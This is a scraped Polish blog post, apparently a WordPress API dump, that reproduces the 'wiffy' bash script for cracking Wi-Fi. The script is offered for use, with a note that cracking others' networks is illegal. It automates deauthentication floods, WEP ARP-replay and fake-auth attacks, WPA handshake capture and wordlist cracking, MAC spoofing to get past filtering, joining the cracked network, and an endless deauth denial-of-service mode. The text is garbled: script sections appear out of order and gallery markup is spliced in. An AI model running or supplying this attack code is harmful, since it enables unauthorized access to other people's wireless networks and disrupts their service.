$diagnostics\n# fi\n# fi\n#fi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Configuring: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: Wireless card\" $diagnostics ; fi\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" == \"$monitorInterface\" ] ; then\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\nfi\n\naction \"Monitor Mode (Starting)\" \"airmon-ng start $interface | awk '\/monitor mode enabled on\/ {print \\$5}' | tr -d '\\011' | sed -e \\\"s\/(monitor mode enabled on \/\/\\\" | sed 's\/\\(.*\\).\/\\1\/' > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\ncommand=$(cat \/tmp\/wiffy.tmp)\nif [ \"$monitorInterface\" != \"$command\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display info \"Configuring: Chaning monitorInterface to: $command\" $diagnostics\n fi\n monitorInterface=$command\nfi\n\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" != \"$monitorInterface\" ] ; then\n sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" != \"$monitorInterface\" ] ; then\n display error \"The monitor interface $monitorInterface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display diag \"Testing: Wireless Injection\" $diagnostics\n command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)\n if [ \"$diagnostics\" == \"true\" ] ; then echo -e $command >> $logFile ; fi\n if [ -z \"$(echo \\\"$command\\\" | grep 'Injection is working')\" ] ; then display error \"$monitorInterface doesn't support packet injecting.\" $diagnostics 1>&2\n elif [ -z \"$(echo \\\"$command\\\" | grep 'Found 0 APs')\" ] ; then display error \"Couldn't test packet injection\" $diagnostics 1>&2 ;\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$macMode\" != \"false\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: MAC address\" $diagnostics ; fi\n command=\"ifconfig $monitorInterface down &&\"\n if [ \"$macMode\" == \"random\" ] ; then command=\"$command macchanger -A $monitorInterface &&\"; fi\n if [ \"$macMode\" == \"set\" ] ; then command=\"$command macchanger -m $fakeMac $monitorInterface &&\"; fi\n command=\"$command ifconfig $monitorInterface up\"\n action \"Configuring: MAC address\" \"$command\" $verbose $diagnostics \"true\"\n sleep 2\n mac=\"$fakeMac\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$mode\" == \"crack\" ] ; then\n if [ -z \"$client\" ] ; then\n display action \"Detecting: Client(s)\" $diagnostics\n findClient $encryption\n fi\n\n #----------------------------------------------------------------------------------------------#\n display action \"Starting: airodump-ng\" $diagnostics\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy --output-format cap $monitorInterface\" $verbose $diagnostics \"true\" \"0|0|13\" & # Don't wait, do the next command\n sleep 1\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] ; then\n if [ \"$client\" == \"clientless\" ] ; then\n display action \"Attack (FakeAuth): $fakeMac\" $diagnostics\n action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $mac $monitorInterface\" $verbose $diagnostics \"true\"\n #action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 30 -o 1 -q 10 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n #if [Association successful] = then\n client=$mac\n sleep 1\n fi\n display action \"Attack (ARPReplay+Deauth): $client\" $diagnostics\n action \"aireplay-ng (arpreplay)\" \"aireplay-ng --arpreplay -e \\\"$essid\\\" -b $bssid -h $client $monitorInterface\" $verbose $diagnostics \"true\" \"0|195|10\" & # Don't wait, do the next command\n sleep 1\n action \"aireplay-ng (deauth)\" \"aireplay-ng --deauth 5 -e \\\"$essid\\\" -a $bssid -c $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\n if [ \"$client\" == \"$mac\" ] ; then sleep 20 && action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\" ; fi\n sleep 60\n\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Capturing: Handshake\" $diagnostics\n loop=\"0\" # 0 = first, 1 = client, 2 = everyone\n echo \"g0tmi1k\" > \/tmp\/wiffy.tmp\n for (( ; ; )) ; do\n action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w \/tmp\/wiffy.tmp -e \\\"$essid\\\" > \/tmp\/wiffy.handshake\" $verbose $diagnostics \"true\"\n command=$(cat \/tmp\/wiffy.handshake | grep \"Passphrase not in dictionary\" ) #Got no data packets from client network & No valid WPA handshakes found\n if [ \"$command\" ] ; then break; fi\n sleep 2\n if [ \"$loop\" != \"1\" ] ; then\n if [ \"$loop\" != \"0\" ] ; then findClient $encryption ; fi\n sleep 1\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): $client\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid -c $client mon0\" $verbose $diagnostics \"true\"\n loop=\"1\"\n else\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): *everyone*\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid mon0\" $verbose $diagnostics \"true\"\n loop=\"2\"\n fi\n sleep 1\n done\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Captured: Handshake\" $diagnostics ; fi\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n fi\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] || [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Starting: aircrack-ng\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|350|30\" ; fi\n if [ \"$encryption\" == \"WPA\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w $wordlist -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|0|20\" ; fi\n fi\n\n #----------------------------------------------------------------------------------------------#\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n action \"airmon-ng\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n\n #----------------------------------------------------------------------------------------------#\n if [ -e \"\/tmp\/wiffy.key\" ] ; then\n key=$(cat \/tmp\/wiffy.key)\n display info \"WiFi key: $key\" $diagnostics\n #----------------------------------------------------------------------------------------------#\n if [ \"$extras\" == \"true\" ] ; then\n if [ \"$client\" != \"$mac\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Spoofing): $client ('Helps' with MAC filtering) \" $diagnostics ; fi\n action \"airmon-ng\" \"ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up\" $verbose $diagnostics \"true\"\n fi\n display action \"Joining: $essid\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then\n action \"i[f\/w]config\" \"ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up\" $verbose $diagnostics \"true\"\n elif [ \"$encryption\" == \"WPA\" ] ; then\n action \"wpa_passphrase\" \"wpa_passphrase $essid '$key' > \/tmp\/wiffy.conf\" $verbose $diagnostics \"true\"\n action \"wpa_supplicant\" \"wpa_supplicant -B -i $interface -c \/tmp\/wiffy.conf -D wext\" $verbose $diagnostics \"true\"\n fi\n sleep 5\n action \"dhclient\" \"dhclient $interface\" $verbose $diagnostics \"true\"\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n ourIP=$(ifconfig $interface | awk '\/inet addr\/ {split ($2,A,\":\"); print A[2]}')\n display info \"IP: $ourIP\" $diagnostics\n #gateway=$(route -n | grep $interface | awk '\/^0.0.0.0\/ {getline; print $2}')\n #display info \"Gateway: $gateway\" $diagnostics\n fi\n fi\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display error \"WiFi Key not in wordlist\" $diagnostics 1>&2\n display action \"Moving handshake: $(pwd)\/wiffy-$essid.cap\" $diagnostics 1>&2\n action \"Moving capture\" \"mv -f \/tmp\/wiffy*.cap $(pwd)\/wiffy-$essid.cap\" $verbose $diagnostics \"true\"\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" != \"N\/A\" ] ; then\n display error \"Something went wrong )=\" $diagnostics 1>&2\n fi\n\n\n#----------------------------------------------------------------------------------------------#\nelif [ \"$mode\" == \"dos\" ] ; then\n display action \"Attack (DOS): $essid\" $diagnostics\n command=\"aireplay-ng --deauth 0 -e \\\"$essid\\\" -a $bssid\"\n if [ \"$client\" != \"clientless\" ] ; then command=\"$command -c $client\" ; fi\n command=\"$command $monitorInterface\"\n action \"aireplay-ng (DeAuth)\" \"$command\" $verbose $diagnostics \"true\" &\n\n #----------------------------------------------------------------------------------------------#\n display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n for (( ; ; )) ; do\n sleep 5\n done\n#elif [ \"$mode\" == \"inject\" ] ; then\n# display action \"Attack (Inject): $essid\" $diagnostics\n# if [ \"$encryption\" != \"WEP\" ] ; then display error \"Only works on WEP networks\" $diagnostics 1>&2 ; cleanup ; fi\n\n #action \"aireplay-ng (Inject)\" \"airtun-ng -a $bssid $monitorInterface\" $verbose $diagnostics \"true\" &\n #action \"aireplay-ng (Inject)\" \"ifconfig at0 192.168.1.83 netmask 255.255.255.0 up\" $verbose $diagnostics \"true\" &\n\n # airmon-ng start wlan0\n # \/pentest\/wireless\/airpwn-1.4\/airpwn -c conf\/greet_html -d rt73 -i mon0 -v\n\n #----------------------------------------------------------------------------------------------#\n# display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n# if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n# for (( ; ; )) ; do\n# sleep 5\n# done\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then echo \"-Done!---------------------------------------------------------------------------------------\" >> $logFile ; fi\ncleanup clean\n\n\n#---Ideas--------------------------------------------------------------------------------------#\n# WEP - Chopchop\/FagmentationAP Packet Broadcast\n# WPA - aircrack\/coWPAtty\n# WPA - brute \/ hash\n# WPA - calculate hash\n# WPA - use pre hash \/ use pre capture\n# WPA - use folder for wordlist\n# WiFi Key is in hex\n# update - aircrack\/coWPATTY\n# decrypt packets - offline & online (airtun-ng)\n# Mode - Injection - GET WORKING\n# display error \"The encryption ($encryption) on $essid isn't support\" $diagnostics 1>&2 ; cleanup\n<\/pre>\nW przypadku kopiowania powy\u017cszego skryptu nale\u017cy go oczywi\u015bcie zapisa\u0107 w pliku o rozszerzeniu *.sh<\/p>\nDo pobrania<\/a>\n*Oczywi\u015bcie nie moje \u017ar\u00f3de\u0142ko. \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"Na pocz\u0105tku chcia\u0142bym zaznaczy\u0107 \u017ce takie \u0142amanie zabezpiecze\u0144 jest nielegalne, i czynisz tym z\u0142o. Jednak dla sprawdzenia naszej sieci, pod wzgl\u0119dem „truno\u015bci” z\u0142amania naszego has\u0142a polecam ten skrypt! ]:-> Chcia\u0142bym pokaza\u0107 wam skrypt pewnej osoby zwanej w internecie :\u00a0g0tmi1k Musze powiedzie\u0107 \u017ce \u00a0ch\u0142opak zna si\u0119 na sieciach, i na bashu .. Za pomoc\u0105 tego skryptu […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[236],"class_list":["post-831","post","type-post","status-publish","format-standard","hentry","category-linux","tag-wardriving"],"_links":{"self":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/comments?post=831"}],"version-history":[{"count":0,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831\/revisions"}],"wp:attachment":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/media?parent=831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/categories?post=831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/tags?post=831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}](\"https:\/\/dawidsobieraj.pl\/wp-content\/gallery\/mirow-okolice\/mirow-okolice-0009.jpg\"\n){kind=link}
![\n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\n\t\t<\/div>\n\t<\/div>\n Change the MAC address\nmacMode=\"set\"\nfakeMac=\"00:05:7c:9a:58:3f\"\n\n# [\/path\/to\/the\/folder] The file used to brute force WPA keys.\nwordlist=\"\/pentest\/passwords\/wordlists\/wpa.txt\"\n\n# [true\/false] Connect to network afterwords\nextras=\"false\"\n\n# [true\/false] diagnostics = Creates a output file displays exactly whats going on. [0\/1\/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands\ndiagnostics=\"false\"\nverbose=\"0\"\n\n#---Variables----------------------------------------------------------------------------------#\n version=\"0.1 (#5)\" # Version\nmonitorInterface=\"mon0\" # Default\n bssid=\"\" # null the value\n essid=\"\" # null the value\n channel=\"\" # null the value\n client=\"\" # null the value\n debug=\"false\" # Windows don't close, shows extra stuff\n logFile=\"wiffy.log\" # filename of output\ntrap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)\n\n#----Functions---------------------------------------------------------------------------------#\nfunction findAP () { #findAP\n action \"Scanning network\" \"rm -f \/tmp\/wiffy.tmp && iwlist $interface scan > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\n #arrayESSID=( $(cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}') )\n arrayBSSID=( $(cat \/tmp\/wiffy.tmp | grep \"Address:\" | awk '{print $5}\\') )\n arrayChannel=( $(cat \/tmp\/wiffy.tmp | grep \"Channel:\" | tr ':' ' ' | awk '{print $2}\\') )\n arrayProtected=( $(cat \/tmp\/wiffy.tmp | grep \"key:\" | sed 's\/.*key:\/\/g') )\n arrayQuality=( $(cat \/tmp\/wiffy.tmp | grep \"Quality\" | sed 's\/.*Quality=\/\/g' | awk -F \" \" '{print $1}' ) )\n\n id=\"\"\n index=\"0\"\n for item in \"${arrayBSSID[@]}\"; do\n if [ \"$bssid\" ] && [ \"$bssid\" == \"$item\" ] ; then id=\"$index\" ;fi\n command=$(cat \/tmp\/wiffy.tmp | sed -n \"\/$item\/, +20p\" | grep \"WPA\" )\n if [ \"$command\" ] ; then arrayEncryption[$index]=\"WPA\"\n elif [ ${arrayProtected[$index]} == \"off\" ] ; then arrayEncryption[$index]=\"N\/A\"\n else arrayEncryption[$index]=\"WEP\" ; fi\n index=$(($index+1))\n done\n\n #-Cheap hack to support essids with spaces in-----------------------------------------------------------\n cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}' | sed 's\/\\\"\/\/' | sed 's\/\\(.*\\)\\\"\/\\1\/' > \/tmp\/wiffy.ssid\n index=\"0\"\n while read line ; do\n if [ \"$essid\" ] && [ \"$essid\" == \"$line\" ] ; then id=\"$index\" ; fi\n arrayESSID[$index]=\"$line\"\n index=$(($index+1))\n done < \"\/tmp\/wiffy.ssid\"\n rm -f \/tmp\/wiffy.ssid\n #--------------------------------------------------------------------------------------------------------------\n}\nfunction findClient () { #findClient $encryption\n if [ -z \"$1\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n client=\"\"\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng (client(s))\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy.dump --output-format netxml $monitorInterface\" $verbose $diagnostics \"true\" &\n sleep 3\n\n if [ \"$1\" == \"WEP\" ] || [ \"$1\" == \"N\/A\" ] ; then # N\/A = For MAC filtering\n sleep 5\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n elif [ \"$1\" == \"WPA\" ] ; then\n while [ -z \"$client\" ] ; do\n sleep 2\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n done\n fi\n\n if [ -z \"$essid\" ] ; then\n essid=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/')\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*hidden* essid=$essid\" $diagnostics ; fi\n fi\n\n command=$(ps aux | grep \"airodump-ng\" | awk '!\/grep\/ && !\/awk\/ && !\/cap\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\n if [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\"\n sleep 1\n fi\n\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump*\" $verbose $diagnostics \"true\"\n if [ \"$client\" == \"\" ] ; then client=\"clientless\" ; fi\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"client=$client\" $diagnostics ; fi\n return 0\n else\n display error \"findClient. Error code: $error\" $diagnostics 1>&2\n return 1\n fi\n}\nfunction update() { # update\n if [ -e \"\/usr\/bin\/svn\" ] ; then\n display action \"Checking for an update...\" $diagnostics\n update=$(svn info http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/ | grep \"Last Changed Rev:\" |cut -c11-)\n if [ \"$version\" != \"0.3 (#$update)\" ] ; then\n display info \"Updating...\" $diagnostics\n svn export -q --force http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh wiffy.sh\n display info \"Updated to $update. (=\" $diagnostics\n else\n display info \"You're using the latest version. (=\" $diagnostics\n fi\n else\n display info \"Updating...\" $diagnostics\n wget -nv -N http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh\n display info \"Updated! (=\" $diagnostics\n fi\n echo\n exit 2\n}\nfunction cleanup() { # cleanup mode\n if [ \"$1\" == \"nonuser\" ] ; then exit 3 ; fi\n\n action \"Killing xterm\" \"killall xterm\" $verbose $diagnostics \"true\"\n if [ \"$1\" != \"clean\" ] ; then\n echo # Blank line\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*** BREAK ***\" $diagnostics ; fi # User quit\n fi\n display action \"Restoring: Environment\" $diagnostics\n\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" == \"$monitorInterface\" ] ; then\n sleep 3 # Sometimes it needs to catch up\/wait\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n fi\n\n if [ \"$debug\" != \"true\" ] ; then\n command=\"\"\n tmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\n tmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\n tmp=$(ls replay_arp*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\n if [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\n if [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\n if [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\n if [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\n if [ ! -z \"$command\" ] ; then action \"Removing temp files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n fi\n\n echo -e \"\\e[01;36m[*]\\e[00m Done! (= Have you... g0tmi1k?\"\n exit 0\n}\nfunction help() {\n echo \"(C)opyright 2010 g0tmi1k ~ http:\/\/g0tmi1k.blogspot.com\n\n Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack\/dos] -e [essid] -b [bssid]\n -c [mac] -w [\/path\/to\/file] (-z \/ -s [mac]) -x -d (-v \/ -V) ([-u] [-?])\n\n Options:\n -i --- Internet Interface e.g. $interface\n -t --- Monitor Interface e.g. $monitorInterface\n\n -m --- Mode. e.g. $mode\n\n -e --- ESSID (WiFi Name)\n -b --- BSSID (AP MAC Address)\n -c --- Client that is connect to the acess point\n\n -w --- Path to Wordlist e.g. $wordlist\n\n -z --- Change interface's MAC Address e.g. $macMode\n -s --- Use this MAC Address e.g. $fakeMac\n\n -x --- Connect to network afterwords\n\n -d --- Diagnostics (Creates output file, $logFile)\n -v --- Verbose (Displays more)\n -V --- (Higher) Verbose (Displays more + shows commands)\n\n -u --- Update\n -? --- This\n\n\n\n Known issues:\n -WEP\n > Didn't detect my client\n + Add it in manually\n + Re-run the script\n > IV's doesn't increae\n + DeAuth didn't work --- Client using Windows 7?\n + Use a different router\/client\n\n -WPA\n > You can ONLY crack WPA when:\n + The ESSID is known\n + The WiFi key is in the word-list\n + There is a connected client\n\n -Doesn't detect any\/my wireless network\n > Don't run from a virtual machine\n > Driver issue - Use a different WiFi device\n > Try the 're[f]resh' option\n > Unplug WiFi device, wait, replug\n > You're too close\/far away\n\n -\\\"Extras\\\" doesn't work\n > Network doesn't have a DHCP server\n\n -Slow\n > Try a different attack... manually!\n\"\n exit 1\n}\nfunction action() { # action title command $verbose $diagnostics screen&file x|y|lines hold\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n xterm=\"xterm\" #Defaults\n command=$2\n x=\"100\"\n y=\"0\"\n lines=\"15\"\n if [ \"$7\" == \"hold\" ] ; then xterm=\"$xterm -hold\" ; fi\n if [ \"$3\" == \"2\" ] ; then echo \"Command: $command\" ; fi\n if [ \"$4\" == \"true\" ] ; then echo \"$1~$command\" >> $logFile ; fi\n if [ \"$4\" == \"true\" ] && [ \"$5\" == \"true\" ] ; then command=\"$command | tee -a $logFile\" ; fi\n if [ ! -z \"$6\" ] ; then\n x=$(echo $6 | cut -d'|' -f1)\n y=$(echo $6 | cut -d'|' -f2)\n lines=$(echo $6 | cut -d'|' -f3)\n fi\n $xterm -geometry 100x$lines+$x+$y -T \"wiffy v$version - $1\" -e \"$command\"\n return 0\n else\n display error \"action. Error code: $error\" $diagnostics 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7\" >> $logFile ;\n return 1\n fi\n}\nfunction display() { # display type message $diagnostics\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$1\" != \"action\" ] && [ \"$1\" != \"info\" ] && [ \"$1\" != \"diag\" ] && [ \"$1\" != \"error\" ] ; then error=\"5\"; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n output=\"\"\n if [ \"$1\" == \"action\" ] ; then output=\"\\e[01;32m[>]\\e[00m\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"\\e[01;33m[i]\\e[00m\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"\\e[01;34m[+]\\e[00m\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"\\e[01;31m[-]\\e[00m\" ; fi\n output=\"$output $2\"\n echo -e \"$output\"\n if [ \"$3\" == \"true\" ] ; then\n if [ \"$1\" == \"action\" ] ; then output=\"[>]\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"[i]\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"[+]\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"[-]\" ; fi\n echo -e \"---------------------------------------------------------------------------------------------\\n$output $2\" >> $logFile\n fi\n return 0\n else\n display error \"display. Error code: $error\" $logFile 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: display (Error code: $error): $1 , $2 , $3 \" >> $logFile ;\n return 1\n fi\n}\n\n\n#----------------------------------------------------------------------------------------------#\necho -e \"\\e[01;36m[*]\\e[00m wiffy v$version\"\n\n#----------------------------------------------------------------------------------------------#\nwhile getopts \"i:t:m:e:b:c:w:z:s:xdvVu?\" OPTIONS; do\n case ${OPTIONS} in\n i ) interface=$OPTARG;;\n t ) monitorInterface=$OPTARG;;\n m ) mode=$OPTARG;;\n e ) essid=$OPTARG;;\n b ) bssid=$OPTARG;;\n c ) client=$OPTARG;;\n w ) wordlist=$OPTARG;;\n z ) macMode=$OPTARG;;\n s ) fakeMac=$OPTARG;;\n x ) extras=\"true\";;\n d ) diagnostics=\"true\";;\n v ) verbose=\"1\";;\n V ) verbose=\"2\";;\n u ) update;;\n ? ) help;;\n * ) display error \"Unknown option.\" $diagnostics 1>&2 ;; # Default\n esac\ndone\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$debug\" == \"true\" ] ; then\n display info \"Debug mode\" $diagnostics\nfi\nif [ \"$diagnostics\" == \"true\" ] ; then\n display diag \"Diagnostics mode\" $diagnostics\n echo -e \"wiffy v$version\\n$(date)\" > $logFile\n echo \"wiffy.sh\" $* >> $logFile\nfi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Analyzing: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$(id -u)\" != \"0\" ] ; then display error \"Not a superuser.\" $diagnostics 1>&2 ; cleanup nonuser; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=\"\"\ntmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\ntmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\ntmp=$(ls replay_arp*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\nif [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\nif [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\nif [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\nif [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\nif [ ! -z \"$command\" ] ; then action \"Removing old files\" \"rm -rfv $command\" $verbose 